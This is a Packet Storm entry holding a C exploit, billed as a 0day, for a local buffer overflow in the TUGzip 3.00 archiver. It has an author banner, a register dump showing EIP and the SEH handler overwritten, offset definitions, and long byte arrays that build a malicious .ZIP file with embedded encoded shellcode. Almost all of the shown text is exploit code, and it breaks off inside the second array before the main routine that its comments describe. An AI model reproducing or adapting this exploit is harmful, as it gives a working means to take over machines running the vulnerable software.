tugzip-overflow.txt

2008-10-27T00:00:00
ID PACKETSTORM:71235
Type packetstorm
Reporter fl0 fl0w
Modified 2008-10-27T00:00:00

Description

                                        
                                            `/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow  
"If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)  
Well hello there, greetz from Romania, here is an exploit for the archiver TUGzip.  
So the payload doesn't always execute; it's just a matter of patience: out of 10  
attempts you get success on 2 in the best case. Got 3 more archivers with stack  
overflow and heap overflow,I'm bored... I'm looking for a new approach,will see  
soon what I'm going to bring you.  
"Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"  
Credits go to Stefan Marin or fl0 fl0w :) .  
All the best !  
  
Registers  
EAX 00000000  
ECX 00000064  
EDX 0013F6D0  
EBX 0117ABDC  
ESP 0013F6D0  
EBP 45444342  
ESI 0117AF6C  
EDI 00D88B1C  
EIP 58585858  
  
SEH chain of main thread, item 0  
Address=0013F6D0  
SE handler=C9C9C9C9  
  
*/  
#include<stdio.h>  
#include<stdlib.h>  
#include<string.h>  
#include<windows.h>  
  
/* Fixed byte offsets into the output buffer that main() patches after the
 * two file_* arrays have been concatenated. All three are absolute offsets
 * from the start of the buffer, not relative to each other. */
#define OFFSET 2504  /* where the 4-byte targets[].addr value is written */
#define NOP 2515     /* where 20 bytes of 0x90 are written */
#define shellcode_offset 2535  /* where the selected shellcode array is copied */
  
  
/*
 * First part of the crafted archive image. It opens with the ZIP local file
 * header signature (0x50 0x4B 0x03 0x04, "PK\3\4"); the long runs of 0x32 ('2')
 * and of repeated letters are filler, the name field ends in ".txt"
 * (0x2E 0x74 0x78 0x74) and a central-directory entry signature
 * (0x50 0x4B 0x01 0x02) follows it. main() copies the whole array, including
 * its terminating NUL, to the start of the output buffer and then overwrites
 * the regions at OFFSET, NOP and shellcode_offset on top of it.
 */
char file_1[]=  
"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68"  
"\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A"  
"\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66"  
"\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74"  
"\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75"  
"\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75"  
"\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66"  
"\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72"  
"\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73"  
"\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64"  
"\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68"  
"\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75"  
"\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A"  
"\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71"  
"\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68"  
"\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73"  
"\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75"  
"\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F"  
"\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66"  
"\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F"  
"\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68"  
"\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64"  
"\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F"  
"\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65"  
"\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41"  
"\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45"  
"\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56"  
"\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B"  
"\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A"  
"\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50"  
"\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F"  
"\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45"  
"\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52"  
"\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E"  
"\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F"  
"\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33"  
"\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56"  
"\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33"  
"\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36"  
"\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59"  
"\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47"  
"\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50"  
"\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53"  
"\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46"  
"\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41"  
"\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52"  
"\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53"  
"\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43"  
"\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49"  
"\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42"  
"\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48"  
"\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44"  
"\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B"  
"\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B"  
"\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E"  
"\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B"  
"\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B"  
"\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42"  
"\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B"  
"\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B"  
"\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B"  
"\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B"  
"\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B"  
"\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B"  
"\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A"  
"\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48"  
"\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43"  
"\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D"  
"\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45"  
"\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44"  
"\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47"  
"\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43"  
"\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41"  
"\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46"  
"\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42"  
"\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50"  
"\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42"  
"\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48"  
"\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A"  
"\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45"  
"\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43"  
"\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E"  
"\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42"  
"\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E"  
"\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A"  
"\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F"  
"\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C"  
"\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A"  
"\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C"  
"\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E"  
"\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42"  
"\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48"  
"\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74"  
"\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC"  
"\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08"  
"\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"  
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"  
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43"  
"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41";  
  
/*
 * Second part of the archive image. main() places it so that its first byte
 * overwrites file_1's terminating NUL, i.e. the two arrays form one
 * contiguous image. Bytes 4..7 are 0xCC (the x86 int3 opcode); the array ends
 * with the ZIP end-of-central-directory signature (0x50 0x4B 0x05 0x06) and
 * its fixed fields. sizeof(file_2) counts the trailing NUL, which is copied
 * into the buffer as well.
 */
char file_2[]=  
"\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A"  
"\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B"  
"\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C"  
"\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E"  
"\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F"  
"\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50"  
"\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51"  
"\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98"  
"\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30"  
"\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56"  
"\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42"  
"\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F"  
"\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F"  
"\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45"  
"\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B"  
"\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49"  
"\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49"  
"\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D"  
"\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A"  
"\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48"  
"\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B"  
"\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41"  
"\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B"  
"\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42"  
"\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42"  
"\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44"  
"\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42"  
"\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48"  
"\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44"  
"\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49"  
"\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43"  
"\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42"  
"\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41"  
"\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F"  
"\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A"  
"\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43"  
"\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49"  
"\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F"  
"\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47"  
"\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46"  
"\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42"  
"\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49"  
"\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D"  
"\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B"  
"\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F"  
"\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41"  
"\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41"  
"\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43"  
"\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42"  
"\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48"  
"\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F"  
"\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61"  
"\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
